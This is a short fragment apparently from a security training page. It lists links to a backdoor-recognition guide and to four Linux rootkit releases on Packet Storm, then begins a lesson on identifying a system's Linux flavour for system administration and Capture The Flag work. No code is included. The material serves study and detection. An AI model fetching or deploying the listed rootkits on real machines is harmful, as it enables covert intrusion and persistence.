Finding backdoors https://www.rawhex.com/2016/03/a-guide-to-recognising-backdoors-using-metasploitable-2/ Rootkits https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html

C16L1: What flavor of *nix are on

What flavor of *nix is on Question: What kind of Linux am I on and how can I find out? Often you’ll find yourself logged into an unfamiliar flavor of Linux/Unix at work in a system administration or security capacity, and also very often in competitive hacking games called Capture The Flag (CTF) competitions. The [...]